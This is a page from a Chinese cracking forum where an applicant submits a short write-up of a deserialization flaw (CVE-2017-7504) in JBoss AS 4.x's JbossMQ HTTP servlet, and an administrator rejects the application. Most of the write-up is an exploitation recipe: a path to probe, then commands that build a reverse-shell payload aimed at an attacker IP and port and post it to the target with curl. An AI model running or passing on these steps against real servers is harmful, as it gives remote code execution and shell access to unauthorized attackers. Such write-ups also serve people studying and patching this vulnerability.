吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2204|回复: 1
收起左侧

[会员申请] 申请ID:dudu9595

[复制链接]
吾爱游客  发表于 2021-1-30 12:07
申请会员ID为:dudu9595
邮箱:dudu9595@yahoo.com
JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X0x01漏洞描述
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。
0x02影响版本JBoss AS 4.x及之前版本0x03漏洞利用1、首先验证目标jboss是否存在此漏洞,直接访问
/jbossmq-httpil/HTTPServerILServlet 路径下。若访问200或下载,则可能存在漏洞。 1607606636_20201208220941482_14194.png 此处我们使用JavaDeserH2HC工具来利用该漏洞,尝试直接弹回一个shell
注意:这个工具在linux系统使用
  • javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
  • java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 反弹的IP:端口
  • curl http://目标IP:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ReverseShellCommonsCollectionsHashMap.ser

端口监听:
1607606636_20201208221156161_24717.png
反弹shell成功
1607606636_20201208221425595_28775.png

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2021-2-1 10:24
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-5-9 19:58

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表